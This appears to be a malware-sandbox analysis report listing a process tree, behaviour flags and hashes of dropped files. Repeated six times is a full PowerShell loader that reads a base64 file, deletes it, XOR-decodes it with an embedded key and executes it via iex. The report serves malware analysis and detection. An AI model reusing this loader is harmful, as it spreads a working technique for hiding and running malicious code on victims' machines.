C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}1⤵
- Loads dropped DLL
PID:4488
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11.7MB
MD5440d4f0c478b77d0e1a95e8165dfb650
SHA1d8cd10e080167a93273a6969b61648ce9b9debb2
SHA25619834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5
-
Filesize
11.7MB
MD5440d4f0c478b77d0e1a95e8165dfb650
SHA1d8cd10e080167a93273a6969b61648ce9b9debb2
SHA25619834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5
-
Filesize
1.9MB
MD5e645ca01c01f9f8489c07a6b41fbd318
SHA13e8ea394f6605bd8529c58a143f01675adee371a
SHA256a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6
-
Filesize
1.9MB
MD5e645ca01c01f9f8489c07a6b41fbd318
SHA13e8ea394f6605bd8529c58a143f01675adee371a
SHA256a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6
-
Filesize
1.9MB
MD5e645ca01c01f9f8489c07a6b41fbd318
SHA13e8ea394f6605bd8529c58a143f01675adee371a
SHA256a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6
-
Filesize
1.9MB
MD5e645ca01c01f9f8489c07a6b41fbd318
SHA13e8ea394f6605bd8529c58a143f01675adee371a
SHA256a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
11.7MB
MD5440d4f0c478b77d0e1a95e8165dfb650
SHA1d8cd10e080167a93273a6969b61648ce9b9debb2
SHA25619834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5
-
Filesize
11.7MB
MD5440d4f0c478b77d0e1a95e8165dfb650
SHA1d8cd10e080167a93273a6969b61648ce9b9debb2
SHA25619834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5
-
Filesize
11.7MB
MD5440d4f0c478b77d0e1a95e8165dfb650
SHA1d8cd10e080167a93273a6969b61648ce9b9debb2
SHA25619834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5
-
Filesize
34KB
MD5c6ae924ad02500284f7e4efa11fa7cfc
SHA12a7770b473b0a7dc9a331d017297ff5af400fed8
SHA25631d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
-
Filesize
34KB
MD5c6ae924ad02500284f7e4efa11fa7cfc
SHA12a7770b473b0a7dc9a331d017297ff5af400fed8
SHA25631d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
-
Filesize
3.1MB
MD5a95712856401dda069ee07c719bdb2ab
SHA173293e45116e0930d78087741016cde920922a74
SHA256b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0
SHA5122ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85
-
C:\Users\Admin\AppData\Roaming\wGITVhmXWQSqpZKRCtElfrun\TesVNngiWXdzUEPmMOBYwhcAuCZyRfIktrSaKvjFpJQLGlxbHoDq
Filesize28KB
MD521fb2997c5f3ae724b68c0abe70d24dc
SHA1a67e74c07b67c7b88260bc0b79d2306312f01b41
SHA2568ffb8a0883f778a001250e734ec0d1ca8a3298a5c0bbcf413925f90d8e5f2fb2
SHA51267cb54e8f0d0c0391cb9c60ec05b312f19e6934bd3affe9b08237d6932acd76b07a4a3075341cd153796211afd5fe3d684825ecfc49e17f2788b37df0bc0ad42
-
Filesize
32B
MD53afc886140acb1fb8adf64e7de31aaf3
SHA14045e92781bb6d0218ad556103bd7cf2744d471d
SHA256cd7fe991a85849fdeca6d5891561672feb6f12b5d52fd5dc00b3c6d3e1754f9a
SHA51214f5e327c64c49ccb4f2874766c587f23b87908fee260b1e265b501f115bbd5f2260554c6283dd6e6a0dc8b40d17d2a8f7bad220bdce332a78b9590a4faca826
-
C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8
Filesize55KB
MD59ad7347a02f60aa376133856f8618acb
SHA13377b9738c82647ff6f0fc741c58548fa8caaf31
SHA256a4f9f4c9dfbe2e61dd8ebe5d1d9bd8a519d5a7833f2653820671a16b49855fea
SHA512a912a3e881168ce1dc23d0c715323a7b02b0c522fd49f7da236d97f8cbb183c2d4bf2be97bac973dfba5852a607ad849e815afdd1c7f033bddafcc0303f18687